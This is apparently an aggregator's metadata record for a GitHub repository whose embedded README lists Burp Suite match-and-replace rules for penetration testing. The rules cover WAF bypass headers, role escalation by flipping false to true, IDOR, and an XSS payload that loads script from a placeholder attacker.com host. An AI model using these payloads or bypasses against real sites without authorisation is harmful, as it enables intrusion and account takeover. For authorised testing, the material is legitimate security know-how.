{"id":13799814,"url":"https://github.com/daffainfo/match-replace-burp","last_synced_at":"2026-01-28T04:47:34.215Z","repository":{"id":37496647,"uuid":"488661870","full_name":"daffainfo/match-replace-burp","owner":"daffainfo","description":"Useful \"Match and Replace\" burpsuite rules","archived":false,"fork":false,"pushed_at":"2023-09-26T23:41:07.000Z","size":15,"stargazers_count":340,"open_issues_count":0,"forks_count":56,"subscribers_count":7,"default_branch":"main","last_synced_at":"2025-01-10T01:51:22.234Z","etag":null,"topics":["bugbounty","burpsuite","hacktoberfest","pentest"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/daffainfo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-05-04T16:23:29.000Z","updated_at":"2024-12-14T13:00:23.000Z","dependencies_parsed_at":"2025-01-10T02:02:08.687Z","dependency_job_id":null,"html_url":"https://github.com/daffainfo/match-replace-burp","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2Fmatch-replace-burp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2Fmatch-replace-burp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2Fmatch-replace-burp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2Fmatch-replace-burp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/daffainfo","download_url":"https://codeload.github.com/daffainfo/match-replace-burp/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240970411,"owners_count":19886558,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","burpsuite","hacktoberfest","pentest"],"created_at":"2024-08-04T00:01:06.308Z","updated_at":"2026-01-28T04:47:34.190Z","avatar_url":"https://github.com/daffainfo.png","language":null,"funding_links":[],"categories":["Custom Features","Others"],"sub_categories":[],"readme":"# Match Replace Burp\nUseful Match and Replace BurpSuite Rules\n\n## Finding hidden buttons, forms, and other UI elements\nMany websites contain hidden buttons, forms, and other UI elements like\n```html\n\u003cdiv aria-hidden=\"true\"\u003e\u003c/div\u003e\n\u003cdiv style=\"visibility: hidden;\"\u003e\u003c/div\u003e\n\u003cdiv style=\"display: none;\"\u003e\u003c/div\u003e\n\u003cscript\u003edocument.getElementbyTagName(\"test\").hidden=true\u003c/script\u003e\n\u003cbutton type=\"button\" disabled\u003etest\u003c/button\u003e\n```\n\n* Show Hidden UI (1)\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166728753-b5b04276-fdf0-4102-bfee-7ac8fcd96cd4.png\" width=\"400\" /\u003e\n\n* Show Hidden UI (2)\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166728896-5fb0c698-50bb-4213-b227-6389afaf3854.png\" width=\"400\" /\u003e\n\n* Change disable to enable\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166729298-56e7272c-86c3-4f08-b712-606568a0367f.png\" width=\"400\" /\u003e\n\n## Changing `false` to `true`\nSometimes we can get hidden features by changing from `false` to `true`. The example:\n\n* Changing role from normal user to admin\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166739661-a6e54638-0fa1-464e-b765-4d52b7a223f7.png\" width=\"400\" /\u003e\n\n* Make email verified\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166739292-7bf7bd71-3d7b-4ba0-91e2-97b679c41a83.png\" width=\"400\" /\u003e\n\n## Bypass WAF\nBypassing WAF by adding some headers\n\n* Adding `X-Forwarded-Host: 127.0.0.1`\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166742712-f3208448-ec62-424f-98ac-db3aecb1326b.png\" width=\"400\" /\u003e\n\n\u003e Create another rule but change the header to:\n```\nX-Forwarded-Port: 127.0.0.1\nX-Forwarded-By: 127.0.0.1\nX-Forwarded-Scheme: 127.0.0.1\nX-Frame-Options: Allow\nX-Forwarded-For: 127.0.0.1\nX-Client-IP: 127.0.0.1\nX-Real-IP: 127.0.0.1\nX-Originating-IP: 127.0.0.1\nX-Remote-IP: 127.0.0.1\nX-Remote-Addr: 127.0.0.1\nX-Cluster-Client-IP: 127.0.0.1\nTrue-Client-IP: 127.0.0.1\nClient-IP: 127.0.0.1\nOrigin: null\nOrigin: Domain.attacker.com\n```\n\n## Finding IDOR\nBy changing original user UUID to another UUID\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166742159-f740ec61-cb94-4ee7-bacf-7ed5b00e26bb.png\" width=\"400\" /\u003e\n\n\u003e Create another rule but change the `type` to \"Request First Line\"\n\n## Finding XSS\nBy adding some XSS payload into the request\n\n* Finding XSS on `User-Agent`\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166749425-b9accf44-a606-473d-94c6-8e9562e02c07.png\" width=\"400\" /\u003e\n\n* Finding XSS on `Referer`\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166749753-d68eea0a-e290-4658-a2f1-cf66fcd89342.png\" width=\"400\" /\u003e\n\n* Auto replace user input with XSS payload\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166752610-9d21d86e-49e5-4e8f-86bc-a9134350d46d.png\" width=\"400\" /\u003e\n\n\u003e So by just inputting the words `xss_payload` on the website it will be immediately replaced with `\"\u003e\u003cscript src=https://attacker.com\u003e\u003c/script\u003e`\n\u003e Change the XSS payload as you want\n\n## MISC\nSome random match and replace rules\n* Finding [CVE-2021-44228](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q)\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166748175-6782ce51-b10f-4b1d-b8a3-610ef142d567.png\" width=\"400\" /\u003e\n\n\u003e Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere\n\n* Help companies to identify your traffic and separate them from malicious traffic by adding a custom header\n\n\u003cimg src=\"https://user-images.githubusercontent.com/36522826/166796789-e184716f-00a3-428d-9323-bcd985556798.png\" width=\"400\" /\u003e\n\nReferences:\n- https://twitter.com/PTestical/status/1413497660133318659\n- https://twitter.com/HolyBugx/status/1355472991061213184\n- https://twitter.com/intigriti/status/1192103070072741894\n- https://twitter.com/payloadartist/status/1469582893772984322\n- https://twitter.com/payloadartist/status/1422247377516122114\n- https://twitter.com/hackerscrolls/status/1247177578269597698\n\n\u003e Soon will be updated again\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaffainfo%2Fmatch-replace-burp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdaffainfo%2Fmatch-replace-burp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaffainfo%2Fmatch-replace-burp/lists"}